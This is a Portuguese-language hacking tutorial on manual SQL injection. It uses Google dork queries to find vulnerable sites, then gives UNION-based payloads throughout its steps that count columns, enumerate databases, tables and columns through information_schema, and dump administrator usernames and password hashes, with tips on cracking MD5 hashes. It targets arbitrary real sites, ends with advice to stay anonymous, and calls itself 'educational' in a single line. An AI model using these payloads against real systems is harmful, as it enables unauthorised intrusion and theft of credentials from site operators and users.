Injeção manual de SQL.
Passo 1: Encontrar um alvo.
Para aqueles que são novos em hacking na web, usar o google dorks pode realmente ajudar. Aqui estão alguns:
Código:
inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
Clique em um link, deixe-o carregar. Se carregar corretamente, coloque um ' no final, você obterá algo semelhante a isto:
É explorável!
Etapa 2: encontre o número de colunas.
Agora, tire o ' e adicione: order by 5--
Se você receber um erro, legal, continue lendo de qualquer maneira. Se não, continue a ler - você precisa.
Continue adicionando 5 até obter uma tela semelhante a esta:
Em seguida, entre o 5 funcional e o 5 não funcional, aumente a ordem por número em 1 a cada vez (ordem por 6--, ordem por 7--, etc.) até que não carregue ou dê um erro. Claro, com minha sorte, recebi o erro ON error 10. Portanto, existem 9 colunas!
Etapa 3: descubra qual coluna é vulnerável.
Depois de id=, coloque um -
Isso é importante!
Em seguida, digite após o número, union all select 1,2,3,4,5,6,7,8,9--
Obviamente, se seu site tiver apenas 4 colunas, seria union all select 1,2, 3,4
Você saberá qual coluna é vulnerável diretamente.
Etapa 4: Obtenha a versão do MySQL
Para a coluna vulnerável, substitua o número por @@version
A partir de agora, exemplos serão mostrados como meus, basta modificar isso para funcionar com seu site!
Etapa 5: obter bancos de dados
Altere suas informações para: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--
Em seguida, altere group_concat(schema_name) para database(), que fornecerá seu banco de dados atual.
Etapa 6: obter tabelas A
seguir:
union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--
Deve fornecer a lista de tabelas. Imgur parou de funcionar, então comece a pensar!;D
Eu tenho uma tabela chamada admin. Claro que sim!
Etapa 7: Obtenha
a união de colunas, selecione 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--
Eu tenho algumas colunas, uma chamada adminUser e outra chamada adminPassword .
Etapa 8: Logins de administrador!
Você está quase pronto!
union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--
Lembre-se, colunas entre parênteses, tabela no final
Se você obtiver strings do que parece ser randomizado letras e números, isso é md5, então apenas google "descriptografar md5 online" ou obter Cain e Abel
A partir daí, acho que você sabe o que fazer. Piscadela
Isso é apenas para propósitos educacionais. Você é responsável pelo que faz, mas lembre-se de permanecer anônimo!